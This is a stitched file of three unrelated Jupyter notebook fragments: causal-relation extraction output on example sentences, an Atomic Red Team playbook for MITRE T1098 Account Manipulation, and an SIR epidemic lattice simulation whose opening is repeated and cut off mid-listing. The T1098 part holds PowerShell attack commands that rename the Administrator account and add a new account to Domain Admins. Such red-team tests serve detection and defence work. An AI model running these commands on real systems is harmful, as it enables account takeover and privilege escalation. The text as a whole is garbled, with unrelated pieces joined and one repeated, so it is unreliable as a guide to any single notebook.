[(['Traffic', 'vibrations'], ['the', 'movement'])]
------------------
Sentence-136 The cutaneous mycoses are caused by a homogeneous group of keratinophilic fungi termed the dermatophytes
[(['keratinophilic', 'fungi'], ['The', 'cutaneous', 'mycoses'])]
[(['a', 'homogeneous', 'group'], ['The', 'cutaneous', 'mycoses'])]
------------------
Sentence-137 Method according to claim 1 , characterized in that the time duration of the quality reduction is limited at least to the duration of the interference triggered by the switching process
[(['the', 'switching', 'process'], ['the', 'interference'])]
[(['the', 'switching', 'process'], ['the', 'interference'])]
------------------
Sentence-138 Smoke is one of the leading causes of kidney failures
[(['Smoke'], ['kidney', 'failures'])]
[(['Smoke'], ['kidney', 'failures'])]
------------------
Sentence-139 The disruption caused by the latest Christmas terrorist has added too much to the weary trip home
[(['the', 'latest', 'Christmas', 'terrorist'], ['The', 'disruption'])]
[(['the', 'latest', 'Christmas', 'terrorist'], ['The', 'disruption'])]
------------------
Sentence-140 Use outdoor where sunlight and glare cause eye strain and fatigue
[(['sunlight'], ['eye', 'strain', 'and', 'fatigue']), (['glare'], ['eye', 'strain', 'and', 'fatigue'])]
[(['sunlight'], ['eye', 'strain']), (['sunlight'], ['fatigue']), (['glare'], ['eye', 'strain']), (['glare'], ['fatigue'])]
------------------
Sentence-141 The announcement of the game caused a stir on the web yesterday , with the Weekly Standard launching a protest campaign encouraging readers to e-mail Microsoft and T-Enterprise , the out-of-its-depth company that had hired actual Gitmo detainee Moazzam Begg as a consultant on the game
[(['The', 'announcement'], ['a', 'stir'])]
[(['The', 'announcement'], ['a', 'stir'])]
------------------
Sentence-142 In these cases , the disappointment from the purchase is not forgotten over time , but rather accumulates
[(['the', 'purchase'], ['the', 'disappointment'])]
[(['the', 'purchase'], ['the', 'disappointment'])]
------------------
Sentence-143 Four of the entrapments resulted in suffocation : a 7-month-old in Gouverneur , N Y ; a 7-month-old in New Iberia , La ; a 6-month-old in Summersville , W Va ; and a 9-month-old in Bronx , N Y
[(['the', 'entrapments'], ['suffocation'])]
[(['the', 'entrapments'], ['suffocation'])]
------------------
Sentence-144 Muscle fatigue is the number one cause of arm muscle pain
[(['Muscle', 'fatigue'], ['arm', 'muscle', 'pain'])]
[(['Muscle', 'fatigue'], ['arm', 'muscle', 'pain'])]
------------------
Sentence-145 Thus previous scientific estimates had overstated the devastation caused by the asteroid , since topographic and ecologic factors contributing to the result had not been taken into account
[(['the', 'asteroid'], ['the', 'devastation']), (['topographic', 'and', 'ecologic', 'factors'], ['the', 'result'])]
[(['the', 'asteroid'], ['the', 'devastation'])]
------------------
Sentence-146 Lavender is excellent in the reatment of headaches from fatigue and exhaustion
[(['fatigue'], ['headaches']), (['exhaustion'], ['headaches'])]
[(['fatigue'], ['headaches']), (['exhaustion'], ['headaches'])]
------------------
Sentence-147 The vascular dilatation was caused by the sympathetic and the course of vaso-motor nerves
[(['the', 'sympathetic'], ['The', 'vascular', 'dilatation']), (['the', 'course'], ['The', 'vascular', 'dilatation'])]
[(['the', 'sympathetic'], ['The', 'vascular', 'dilatation'])]
------------------
Sentence-148 Increased reproductive toxicity of landfill leachate after degradation was caused by nitrite
[(['nitrite'], ['Increased', 'reproductive', 'toxicity'])]
[(['nitrite'], ['Increased', 'reproductive', 'toxicity']), (['nitrite'], ['degradation'])]
------------------
Sentence-149 Snails and slugs cause damage to seedlings , flowers , vegetables and shrubs
[(['Snails'], ['damage']), (['slugs'], ['damage'])]
[(['Snails'], ['damage']), (['slugs'], ['damage'])]
------------------
Sentence-150 Stimulation of the posterior horn of the medial meniscus produced a measurable amount of CMAP latency for the semimembranosus muscle
[(['Stimulation'], ['CMAP', 'latency'])]
[]
------------------
Sentence-151 The warmth was radiating from the fireplace to all corners of the room
[(['the', 'fireplace'], ['The', 'warmth'])]
[(['the', 'fireplace'], ['The', 'warmth'])]
------------------
Sentence-152 Cervical cancer is caused by infection with the human papillomavirus and is one of the most common cancers in women in developing countries
[(['infection'], ['Cervical', 'cancer'])]
[(['infection'], ['Cervical', 'cancer'])]
------------------
Sentence-153 A large tsunami triggered by the earthquake spread outward from off the Sumatran coast
[(['the', 'earthquake'], ['A', 'large', 'tsunami'])]
[(['the', 'earthquake'], ['A', 'large', 'tsunami'])]
------------------
Sentence-154 The transmitter generates the electromagnetic wave , some of which will be incident on the receiver
[(['The', 'transmitter'], ['the', 'electromagnetic', 'wave'])]
[(['The', 'transmitter'], ['the', 'electromagnetic', 'wave'])]
------------------
Sentence-155 Even nuclear energy is among the causes of water pollution
[(['Even', 'nuclear', 'energy'], ['water', 'pollution'])]
[(['nuclear', 'energy'], ['water', 'pollution'])]
------------------
Sentence-156 The drugs he sold had caused the overdose death of Matthew Lessard , 19 , of Lowell
[(['The', 'drugs'], ['the', 'overdose', 'death'])]
[(['The', 'drugs'], ['the', 'overdose', 'death'])]
------------------
Sentence-157 Chest pain from indigestion feels like an intense burning and is usually accompanied by regurgitation and gas
[(['indigestion'], ['Chest', 'pain'])]
[(['indigestion'], ['Chest', 'pain'])]
------------------
Sentence-158 The software caused a pretty good drain on the CPU for some reason
[(['The', 'software'], ['a', 'pretty', 'good', 'drain'])]
[(['The', 'software'], ['a', 'pretty', 'good', 'drain'])]
------------------
Sentence-159 The radiation from the atomic bomb explosion is a typical acute radiation
[(['the', 'atomic', 'bomb', 'explosion'], ['The', 'radiation'])]
[(['the', 'atomic', 'bomb', 'explosion'], ['The', 'radiation'])]
------------------
Sentence-160 Lymphedema is an abnormal build-up of fluid that causes swelling , most often in the arms or legs
[(['Lymphedema'], ['swelling'])]
[(['Lymphedema'], ['swelling'])]
------------------
Sentence-161 These chemical studies were directed toward proof of structure of the indole components of the seeds
[(['These', 'chemical', 'studies'], ['proof'])]
[]
------------------
###Markdown
2-002
###Code
predict('your path to /FLAIR-True_CHAR-cnn_LSTM_MHSA-True_CRF/test/6_{96}.hdf5')
predict('your path to /FLAIR-True_CHAR-None_LSTM_MHSA-False_CRF/test/6_{115}.hdf5')
predict('your path to /FLAIR-False_CHAR-None_LSTM_MHSA-False_CRF/test/6_{198}.hdf5')
###Output
------------------
Sentence-001 Bounding pulses are caused by the relatively low systemic arterial blood pressure due to the continuous runoff of blood from the aorta into the pulmonary artery
[(['the', 'relatively', 'low', 'systemic', 'arterial', 'blood', 'pressure'], ['Bounding', 'pulses']), (['the', 'continuous', 'runoff'], ['the', 'relatively', 'low', 'systemic', 'arterial', 'blood', 'pressure'])]
[(['the', 'relatively', 'low', 'systemic', 'arterial', 'blood', 'pressure'], ['Bounding', 'pulses'])]
------------------
Sentence-002 This year's Nobel Laureates in Physiology or Medicine made the remarkable and unexpected discovery that inflammation in the stomach as well as ulceration of the stomach or duodenum is the result of an infection of the stomach caused by the bacterium Helicobacter pylori
[(['an', 'infection'], ['inflammation']), (['an', 'infection'], ['ulceration']), (['the', 'bacterium', 'Helicobacter', 'pylori'], ['an', 'infection'])]
[(['the', 'bacterium', 'Helicobacter', 'pylori'], ['the', 'remarkable', 'and', 'unexpected', 'discovery']), (['the', 'bacterium', 'Helicobacter', 'pylori'], ['an', 'infection'])]
------------------
Sentence-003 The drone strike that resulted in the death of Pakistan's most wanted terrorist is believed to be a result of deliberately planted false intelligence , sources in South Waziristan have confirmed
[(['The', 'drone', 'strike'], ['the', 'death']), (['deliberately', 'planted', 'false', 'intelligence'], ['The', 'drone', 'strike'])]
[(['The', 'drone', 'strike'], ['the', 'death'])]
------------------
Sentence-004 The violence resulted in the death of police " capo " Filippo Raciti , which caused widespread soul-searching and a week-long suspension of Italian football
[(['The', 'violence'], ['the', 'death']), (['the', 'death'], ['widespread', 'soul-searching']), (['the', 'death'], ['a', 'week-long', 'suspension'])]
[(['The', 'violence'], ['the', 'death']), (['The', 'violence'], ['widespread', 'soul-searching']), (['The', 'violence'], ['a', 'week-long', 'suspension'])]
------------------
Sentence-005 But the discomfort caused by the ointment and the duration of treatment often result in non-compliance
[(['the', 'discomfort'], ['non-compliance']), (['the', 'ointment'], ['the', 'discomfort']), (['the', 'duration'], ['non-compliance'])]
[(['the', 'discomfort'], ['non-compliance']), (['the', 'ointment'], ['the', 'discomfort']), (['treatment'], ['non-compliance'])]
------------------
Sentence-006 Each year , many infants and toddlers die due to suffocation from breathing small objects into their breathing passages and lungs
[(['suffocation'], ['die']), (['breathing', 'small', 'objects'], ['suffocation'])]
[(['breathing'], ['suffocation'])]
------------------
Sentence-007 I used to get terrible headaches from sinus infections that resulted in taking antibiotics a few times a year
[(['terrible', 'headaches'], ['taking', 'antibiotics']), (['sinus', 'infections'], ['terrible', 'headaches'])]
[(['sinus', 'infections'], ['headaches']), (['sinus', 'infections'], ['taking', 'antibiotics'])]
------------------
Sentence-008 The steam caused a backpressure on the VTD , resulting in the rupture disc opening
[(['The', 'steam'], ['a', 'backpressure']), (['a', 'backpressure'], ['the', 'rupture', 'disc', 'opening'])]
[(['The', 'steam'], ['a', 'backpressure']), (['a', 'backpressure'], ['the', 'rupture', 'disc'])]
------------------
Sentence-009 Swissair was a victim of the clandestine wealth-transfer plaguing the productive sector as a result of the falling interest-rate structure caused by bond speculation
[(['the', 'falling', 'interest-rate', 'structure'], ['a', 'victim']), (['bond', 'speculation'], ['the', 'falling', 'interest-rate', 'structure'])]
[(['bond', 'speculation'], ['the', 'falling', 'interest-rate', 'structure'])]
|
playbook/tactics/persistence/T1098.ipynb | ###Markdown
T1098 - Account ManipulationAdversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. Atomic Tests
###Code
#Import the Module before running the tests.
# Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts.
Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force
###Output
_____no_output_____
###Markdown
Atomic Test 1 - Admin Account ManipulateManipulate Admin Account Name**Supported Platforms:** windowsElevation Required (e.g. root or admin) Attack Commands: Run with `powershell````powershell$x = Get-Random -Minimum 2 -Maximum 9999$y = Get-Random -Minimum 2 -Maximum 9999$z = Get-Random -Minimum 2 -Maximum 9999$w = Get-Random -Minimum 2 -Maximum 9999Write-Host HaHaHa_$x$y$z$w$hostname = (Get-CIMInstance CIM_ComputerSystem).Name$fmm = Get-CimInstance -ClassName win32_group -Filter "name = 'Administrators'" | Get-CimAssociatedInstance -Association win32_groupuser | Select Nameforeach($member in $fmm) { if($member -like "*Administrator*") { Rename-LocalUser -Name $member.Name -NewName "HaHaHa_$x$y$z$w" Write-Host "Successfully Renamed Administrator Account on" $hostname } }```
###Code
Invoke-AtomicTest T1098 -TestNumbers 1
###Output
_____no_output_____
###Markdown
Atomic Test 2 - Domain Account and Group ManipulateCreate a random atr-nnnnnnnn account and add it to a domain group (by default, Domain Admins). The quickest way to run it is against a domain controller, using `-Session` of `Invoke-AtomicTest`. Alternatively,you need to install PS Module ActiveDirectory (in prereqs) and run the script with appropriare AD privileges to create the user and alter the group. Automatic installation of the dependency requires an elevated session, and is unlikely to work with Powershell Core (untested).If you consider running this test against a production Active Directory, the good practise is to create a dedicatedservice account whose delegation is given onto a dedicated OU for user creation and deletion, as well as delegatedas group manager of the target group.Example: `Invoke-AtomicTest -Session $session 'T1098' -TestNames "Domain Account and Group Manipulate" -InputArgs @{"group" = "DNSAdmins" }`**Supported Platforms:** windows Dependencies: Run with `None`! Description: PS Module ActiveDirectory Check Prereq Commands:```NoneTry { Import-Module ActiveDirectory -ErrorAction Stop | Out-Null exit 0} Catch { exit 1}``` Get Prereq Commands:```Noneif((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) { Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online} else { Install-WindowsFeature RSAT-AD-PowerShell}```
###Code
Invoke-AtomicTest T1098 -TestNumbers 2 -GetPreReqs
###Output
_____no_output_____
###Markdown
Attack Commands: Run with `powershell````powershell$x = Get-Random -Minimum 2 -Maximum 99$y = Get-Random -Minimum 2 -Maximum 99$z = Get-Random -Minimum 2 -Maximum 99$w = Get-Random -Minimum 2 -Maximum 99Import-Module ActiveDirectory$account = "atr--$x$y$z"New-ADUser -Name $account -GivenName "Test" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False Add-ADGroupMember "Domain Admins" $account```
###Code
Invoke-AtomicTest T1098 -TestNumbers 2
###Output
_____no_output_____ |
notebooks/6-simulations/64-lattice_2d_nneighbors_loop_n2.ipynb | ###Markdown
Dynamics with nearest neighbors interactions[Index](../0-index.ipynb)
###Code
%load_ext autoreload
%autoreload 2
%matplotlib inline
from pathlib import Path
import sys
import numpy as np
import cupy as cp
import pandas as pd
import h5py
import datetime
import scipy
import imageio
from scipy.optimize import curve_fit
from scipy.integrate import solve_ivp
import warnings
warnings.filterwarnings('ignore')
import matplotlib.pyplot as plt
import matplotlib.colors as mco
import matplotlib.gridspec as mgs
import matplotlib.cm as cm
from matplotlib import animation
plt.rcParams['svg.fonttype'] = 'none'
from IPython.display import HTML
from IPython.display import Image
sys.path.append(str(Path('../..') / 'code'))
from functions import laplacian_discrete_conv, lattice_2d_integrate_sir
resdir = Path('../../results/')
if not resdir.is_dir():
raise ValueError('No results directory!')
resfile = resdir / 'lattice_2d_nneighbors.hdf5'
complevel=7
complib='zlib'
if resfile.is_file():
with h5py.File(resfile,'r') as f5py:
f5py.visit(print)
###Output
beta_1.0e-01
beta_1.0e-01/n1_10_n2_0
beta_1.0e-01/n1_10_n2_0/infected
beta_1.0e-01/n1_10_n2_0/susceptible
beta_1.0e-01/n1_10_n2_0/times
beta_1.0e-01/n1_10_n2_1
beta_1.0e-01/n1_10_n2_1/infected
beta_1.0e-01/n1_10_n2_1/susceptible
beta_1.0e-01/n1_10_n2_1/times
beta_1.0e-01/n1_10_n2_2
beta_1.0e-01/n1_10_n2_2/infected
beta_1.0e-01/n1_10_n2_2/susceptible
beta_1.0e-01/n1_10_n2_2/times
beta_1.0e-01/n1_10_n2_4
beta_1.0e-01/n1_10_n2_4/infected
beta_1.0e-01/n1_10_n2_4/susceptible
beta_1.0e-01/n1_10_n2_4/times
beta_1.0e-01/n1_10_n2_6
beta_1.0e-01/n1_10_n2_6/infected
beta_1.0e-01/n1_10_n2_6/susceptible
beta_1.0e-01/n1_10_n2_6/times
beta_1.0e-01/n1_10_n2_8
beta_1.0e-01/n1_10_n2_8/infected
beta_1.0e-01/n1_10_n2_8/susceptible
beta_1.0e-01/n1_10_n2_8/times
n1_10_n2_0
n1_10_n2_0/beta_1.0e-01
n1_10_n2_0/beta_1.0e-01/infected
n1_10_n2_0/beta_1.0e-01/susceptible
n1_10_n2_0/beta_1.0e-01/times
n1_10_n2_0/beta_2.0e-01
n1_10_n2_0/beta_2.0e-01/infected
n1_10_n2_0/beta_2.0e-01/susceptible
n1_10_n2_0/beta_2.0e-01/times
n1_10_n2_0/beta_4.0e-01
n1_10_n2_0/beta_4.0e-01/infected
n1_10_n2_0/beta_4.0e-01/susceptible
n1_10_n2_0/beta_4.0e-01/times
n1_10_n2_0/beta_5.0e-02
n1_10_n2_0/beta_5.0e-02/infected
n1_10_n2_0/beta_5.0e-02/susceptible
n1_10_n2_0/beta_5.0e-02/times
###Markdown
Parameters
###Code
n1 = 10 # 2^n1 is the length
n2 = 0 # 2^n2 is the height
Delta_x = 1
alpha = 1.0e-1 # intra-community infectivity coefficient
beta = alpha # extra-community infectivity coefficient
gamma = 0.1 # inverse recovery time
tmax = 3000. # maximum time
tdump = 1.0e0 # time interval between dumps
params = { \
'delta_x': Delta_x, \
'alpha': alpha, \
'beta': beta, \
'gamma': gamma, \
'n1': n1, \
'n2': n2, \
'tmax': tmax, \
'tdump': tdump
}
params_template = {key: params[key] for key in params.keys()}
pref = "beta_{:.1e}".format(beta)
cp.cuda.Device(0).use()
exts = ['.png', '.svg']
n2_list = [0, 1, 2, 4, 6, 8]
n_list = len(n2_list)
for n2 in n2_list:
print("".join(['-']*10))
print("n2 = {:.1e}".format(n2))
params = {key:params_template[key] for key in params_template.keys()}
params['n2'] = n2
# initial condition
eps = 1.0e-8 # total fraction of population
N = 2**(n1+n2) # total number of communities
S = cp.ones((2**n1, 2**n2), dtype=np.float_)
I = cp.zeros((2**n1, 2**n2), dtype=np.float_)
if n2 == 0:
V = cp.array([N*eps])
else:
V = cp.zeros(2**n2)
V[[2**(n2-1)-1,2**(n2-1)]] = 0.5*N*eps
S[0] -= V
I[0] += V
times, Ss, Is = lattice_2d_integrate_sir(S, I, alpha=alpha, beta=beta, gamma=gamma, tmax=tmax, tdump=tdump, method='DOP853')
print("integration complete")
# save
path = str(Path(pref) / "n1_{:d}_n2_{:d}".format(n1,n2))
with h5py.File(resfile,'a') as f5py:
if not (path in f5py.keys()):
grp = f5py.create_group(path)
grp = f5py[path]
for key in params.keys():
grp.attrs[key] = params[key]
# print(grp.keys())
name = "times"
if name in grp.keys():
del grp[name]
dset = grp.create_dataset(name, shape=times.shape, dtype=times.dtype, data=times, \
compression="gzip", compression_opts=complevel)
name = "susceptible"
if name in grp.keys():
del grp[name]
dset = grp.create_dataset(name, shape=Ss.shape, dtype=Ss.dtype, data=Ss, \
compression="gzip", compression_opts=complevel)
name = "infected"
if name in grp.keys():
del grp[name]
dset = grp.create_dataset(name, shape=Is.shape, dtype=Is.dtype, data=Is, \
compression="gzip", compression_opts=complevel)
print("data written to {:s}>{:s}".format(str(resfile), path))
times_list = []
I_tot_list = []
T_tot_list = []
dT_tot_list = []
Sm_list = []
Im_list = []
Tm_list = []
dTm_list = []
for n2 in n2_list:
path = str(Path(pref) / "n1_{:d}_n2_{:d}".format(n1,n2))
with h5py.File(resfile,'r') as f5py:
if not (path in f5py.keys()):
raise ValueError("{:s} not in the database".format(path))
grp = f5py[path]
# print(grp.keys())
name = "times"
times = grp[name][:]
name = "susceptible"
Ss = grp[name][:]
name = "infected"
Is = grp[name][:]
dt = np.diff(times)[0]
Ts = 1 - Ss
dTs = np.concatenate([Is[0].reshape(1,Is.shape[1], Is.shape[2]), np.diff(Ts, axis=0)], axis=0)
dTs /= dt
dT_tot = np.mean(dTs, axis=(1,2))
T_tot = np.mean(Ts, axis=(1,2))
I_tot = np.mean(Is, axis=(1,2))
if n2 == 0:
midline = [0]
else:
midline = [2**(n2-1)-1,2**(n2-1)]
Sm = np.mean(Ss[:,:,midline], axis=2)
Im = np.mean(Is[:,:,midline], axis=2)
Tm = np.mean(Ts[:,:,midline], axis=2)
dTm = np.mean(dTs[:,:,midline], axis=2)
times_list.append(times)
I_tot_list.append(I_tot)
T_tot_list.append(T_tot)
dT_tot_list.append(dT_tot)
Sm_list.append(Sm)
Im_list.append(Im)
dTm_list.append(dTm)
Tm_list.append(Tm)
###Output
_____no_output_____
###Markdown
Figures
###Code
figdir = Path('..') / '..' / 'figures' / '6-simulations' / '64-lattice_2d_nneighbors_loop_n2'
if not figdir.is_dir():
figdir.mkdir(parents=True, exist_ok=True)
print(figdir)
###Output
../../figures/6-simulations/64-lattice_2d_nneighbors_loop_n2
###Markdown
Total number of new cases
###Code
# parameters
figsize = (6,4.5)
dpi = 300
ms=2
lw=1
show_dT=False
norm = mco.Normalize(vmin=0, vmax=n_list-1)
cmap = cm.rainbow
fig = plt.figure(facecolor='w', figsize=figsize)
ax = fig.gca()
if show_dT:
for n in range(n_list):
n2 = n2_list[n]
times = times_list[n]
dT_tot = dT_tot_list[n]
label = "n2 = {:d}".format(n2)
ax.plot(times,dT_tot, '-', ms=ms, color=cmap(norm(n)), label=label)
ax.set_ylabel("$d T$", fontsize="medium")
fname = 'domega_tot'
else:
for n in range(n_list):
n2 = n2_list[n]
times = times_list[n]
T_tot = T_tot_list[n]
label = "n2 = {:d}".format(n2)
ax.plot(times,T_tot, '-', ms=ms, color=cmap(norm(n)), label=label)
ax.set_ylabel("$T$", fontsize="medium")
fname = 'omega_tot'
ax.legend(loc='best', fontsize='medium')
ax.set_xlim(times[0],None)
plt.xticks(rotation=45)
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
ax.tick_params(left=True, labelleft=True, bottom=True, labelbottom=True)
ax.tick_params(axis='both', length=4)
fig.tight_layout()
for ext in exts:
filepath = figdir / (fname + ext)
fig.savefig(filepath, bbox_inches='tight', pad_inches=0, dpi=dpi)
print("Written file: {:s}".format(str(filepath)))
fig.clf()
plt.close('all')
filepath = figdir / (fname + '.png')
Image(filename=filepath, width=4./3*360)
###Output
_____no_output_____
###Markdown
Wave position
###Code
from functions import lattice_2d_ramp_fit as ramp_fit
from functions import lattice_2d_get_velocity_theoretical as get_velocity_theoretical
from functions import framp
# parameters
figsize = (6,4.5)
dpi = 300
ms=2
lw=1
pfit_list = []
# make figure
fig = plt.figure(facecolor='w', figsize=figsize)
ax = fig.gca()
for n in range(n_list):
n2 = n2_list[n]
times = times_list[n]
dTm = dTm_list[n]
W = np.argmax(dTm, axis=1)
color = cmap(norm(n))
label = "n2 = {:d}".format(n2)
ax.plot(times, W, '-', color=color, lw=lw, ms=ms, label=label)
pfit = ramp_fit(W, times, wmax=0.2*np.max(W), maxfev=1000)
pfit_list.append(pfit)
plt.plot(times, framp(times, *pfit), 'k--', lw=lw)
v = get_velocity_theoretical(beta, gamma, beta, S_ss=1.)
plt.plot(times, v*(times-pfit[1]), 'k-.', lw)
ax.set_xlim(times[0],None)
ax.set_ylim(0., None)
ax.set_xlabel("time", fontsize="medium")
ax.set_ylabel("column", fontsize="medium")
plt.xticks(rotation=45)
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
ax.tick_params(left=True, labelleft=True, bottom=True, labelbottom=True)
ax.tick_params(axis='both', length=4)
fig.tight_layout()
fname = 'wave_position'
for ext in exts:
filepath = figdir / (fname + ext)
fig.savefig(filepath, bbox_inches='tight', pad_inches=0, dpi=dpi)
print("Written file: {:s}".format(str(filepath)))
fig.clf()
plt.close('all')
fname = 'wave_position'
filepath = figdir / (fname + '.png')
Image(filename=filepath, width=4./3*360)
###Output
_____no_output_____
###Markdown
Fit to analytical prediction
###Code
from functions import wave_front_get_ode_sol, get_binned
from scipy.optimize import minimize_scalar, bracket
from functions import lattice_2d_get_velocity as get_velocity
from functions import lattice_2d_rescale_wave_profile as rescale_wave_profile
figsize=(8,4.5)
fig = plt.figure(facecolor='w', figsize=figsize)
ax = fig.gca()
kfit_list = []
dx = params['delta_x']
X = np.arange(2**n1, dtype=np.float_)
for n in range(n_list):
# for n in range(2):
n2 = n2_list[n]
alpha = beta
times = times_list[n]
dTm = dTm_list[n]
W = np.argmax(dTm, axis=1)
color = cmap(norm(n))
label = "n2 = {:d}".format(n2)
v = get_velocity(W, times, wmax=0.2*np.max(W), maxfev=1000)
a = alpha/beta + 4.
C = a*beta**2/(4*v**2)
D = 2*gamma/(beta*a)
CMAX = 1./(16*(1-0.5*D))
print("v = {:.4f} C = {:.4f} D = {:.4f} CMAX = {:.4f}".format(v,C,D,CMAX))
# theoretical value for scale k
kfit = 2*v/beta
# compute profile (centered around its maximum)
Z_C, Y_C, S_C, R_C = wave_front_get_ode_sol(C, D, tmax=10000, npts=100000, eps=1.0e-3)
k0 = np.argmax(Y_C)
Z_C -= Z_C[k0]
# fit the wave profile at a given time
kt = int(0.9*len(times))
Z, Y = rescale_wave_profile(kfit, X, dTm[kt], Z_C, Y_C, v, dx)
# plots
ax.plot(Z_C, Y_C, '-', color=color, lw=lw)
ax.plot(Z, Y, 's', color=color, ms=2*ms, label="n2 = {:d}, C = {:.4f}".format(n2, C))
# ax.plot(Z, G/(v*kfit/2.), 's', color=color, ms=2*ms, label="beta = {:.1e}, C = {:.4f}".format(beta, C))
ax.set_xlim(-100,100)
# ax.set_ylim(0., 1)
ax.legend(loc='upper left', fontsize='medium', bbox_to_anchor=(1., 0.98), frameon=False)
ax.set_xlabel("date", fontsize="medium")
ax.set_ylabel("column", fontsize="medium")
plt.xticks(rotation=45)
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
ax.tick_params(left=True, labelleft=True, bottom=True, labelbottom=True)
ax.tick_params(axis='both', length=4)
fig.tight_layout()
fname = 'profile_collapse_fit'
for ext in exts:
filepath = figdir / (fname + ext)
fig.savefig(filepath, bbox_inches='tight', pad_inches=0, dpi=dpi)
print("Written file: {:s}".format(str(filepath)))
fig.clf()
plt.close('all')
filepath = figdir / (fname + '.png')
Image(filename=filepath, width=4./3*360)
###Output
_____no_output_____
###Markdown
Show wave profiles
###Code
time_sel = np.linspace(0., 200, 21).astype('int64')
for n in range(len(n2_list)):
n2 = n2_list[n]
print("n2 = ¨{:d}".format(n2))
times = times_list[n]
dTm = dTm_list[n]
norm = mco.Normalize(0, len(time_sel)-1)
cmap = cm.viridis
figsize=(12,3)
fig = plt.figure(facecolor='w', figsize=figsize)
ax = fig.gca()
X = np.arange(2**n1, dtype=np.float_)
for k in range(len(time_sel)):
t = time_sel[k]
color = cmap(norm(k))
Y = dTm[t]
idx = Y > 0.
ax.plot(X[idx], Y[idx], '-', color=color, lw=lw)
# ax.legend(loc='best')
ax.set_xlim(0,None)
ax.set_ylim(0., None)
ax.set_xlabel("x", fontsize="medium")
ax.set_ylabel("dT", fontsize="medium")
plt.xticks(rotation=45)
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
ax.tick_params(left=True, labelleft=True, bottom=True, labelbottom=True)
ax.tick_params(axis='both', length=4)
fig.tight_layout(rect=[0., 0., 0.98, 1.])
cax = fig.add_axes(rect=[0.98,0.2,0.01,0.7])
cbar = plt.colorbar(cm.ScalarMappable(norm=norm, cmap=cmap),
cax=cax, extendfrac='auto')
cbar.set_label("time")
fname = 'wave_profiles_n2_{:d}'.format(n2)
for ext in exts:
filepath = figdir / (fname + ext)
fig.savefig(filepath, bbox_inches='tight', pad_inches=0, dpi=dpi)
print("Written file: {:s}".format(str(filepath)))
fig.clf()
plt.close('all')
n2 = 0
fname = 'wave_profiles_n2_{:d}'.format(n2)
filepath = figdir / (fname + '.png')
Image(filename=filepath, width=4./3*480)
###Output
_____no_output_____
###Markdown
Wave animation
###Code
fps = 30
dpi=300
outputdir = figdir / '2d_plots'
idump = max(int(tmax/tdump/1000),1)
for n in range(len(n2_list)):
n2 = n2_list[n]
print("n2 = ¨{:d}".format(n2))
path = str(Path(pref) / "n1_{:d}_n2_{:d}".format(n1,n2))
with h5py.File(resfile,'r') as f5py:
if not (path in f5py.keys()):
raise ValueError("{:s} not in the database".format(path))
grp = f5py[path]
# print(grp.keys())
name = "times"
times = grp[name][::idump]
name = "susceptible"
Ss = grp[name][::idump]
name = "infected"
Is = grp[name][::idump]
dt = np.diff(times)[0]
Ts = 1 - Ss
dTs = np.concatenate([Is[0].reshape(1,Is.shape[1], Is.shape[2]), np.diff(Ts, axis=0)], axis=0)
dTs /= dt
tpdir = outputdir / 'n2_{:d}'.format(n2)
if not tpdir.is_dir():
tpdir.mkdir(parents=True, exist_ok=True)
for ext in exts:
for f in tpdir.glob('*' + ext): f.unlink()
fileout = outputdir / 'n2_{:d}.mp4'.format(n2)
tfmt = "t{:0" + "{:.0f}".format(np.ceil(np.log10(times[-1]))) + ".{:.0f}".format(max(0,-int(np.floor(np.log10(np.diff(times)[0]))))) +"f}"
nt = len(times)
vmax = 10**np.ceil(np.log10(np.max(dTs)))
filenames = []
for kt in range(nt):
t = times[kt]
fig = plt.figure(dpi=dpi)
ax = fig.gca()
title = "t = {:.1f}".format(t)
ax.set_title(title, fontsize="large")
im = ax.imshow(dTs[kt].T, cmap=cm.magma_r, origin='lower', vmin=0., vmax=vmax)
ax.tick_params(axis='both', length=4)
plt.colorbar(im, label='dT')
fname = str(tpdir / tfmt.format(t))
for ext in ['.png']:
fpath = fname + ext
fig.savefig(fpath, dpi=dpi, bbox_inches='tight', pad_inches=0)
fpath = fname + ".png"
filenames.append(fpath)
fig.clf()
plt.close('all')
# write movie
imageio.mimsave(fileout, [imageio.imread(f) for f in filenames], fps=fps)
print(f"Written file {fileout}.")
# shutil.rmtree(tpdir)
k=5
fpath = outputdir / 'n2_{:d}.mp4'.format(n2_list[k])
HTML("""
<video height="360" controls>
<source src="{:s}" type="video/mp4">
</video>
""".format(str(fpath)))
###Output
_____no_output_____
###Markdown
Dynamics with nearest neighbors interactions[Index](../0-index.ipynb)
###Code
%load_ext autoreload
%autoreload 2
%matplotlib inline
from pathlib import Path
import sys
import numpy as np
import cupy as cp
import pandas as pd
import h5py
import datetime
import scipy
import imageio
from scipy.optimize import curve_fit
from scipy.integrate import solve_ivp
import warnings
warnings.filterwarnings('ignore')
import matplotlib.pyplot as plt
import matplotlib.colors as mco
import matplotlib.gridspec as mgs
import matplotlib.cm as cm
from matplotlib import animation
plt.rcParams['svg.fonttype'] = 'none'
from IPython.display import HTML
from IPython.display import Image
sys.path.append(str(Path('../..') / 'code'))
from functions import laplacian_discrete_conv, lattice_2d_integrate_sir
resdir = Path('../../results/')
if not resdir.is_dir():
raise ValueError('No results directory!')
resfile = resdir / 'lattice_2d_nneighbors.hdf5'
complevel=7
complib='zlib'
if resfile.is_file():
with h5py.File(resfile,'r') as f5py:
f5py.visit(print)
###Output
beta_1.0e-01
beta_1.0e-01/n1_10_n2_0
beta_1.0e-01/n1_10_n2_0/infected
beta_1.0e-01/n1_10_n2_0/susceptible
beta_1.0e-01/n1_10_n2_0/times
beta_1.0e-01/n1_10_n2_1
beta_1.0e-01/n1_10_n2_1/infected
beta_1.0e-01/n1_10_n2_1/susceptible
beta_1.0e-01/n1_10_n2_1/times
beta_1.0e-01/n1_10_n2_2
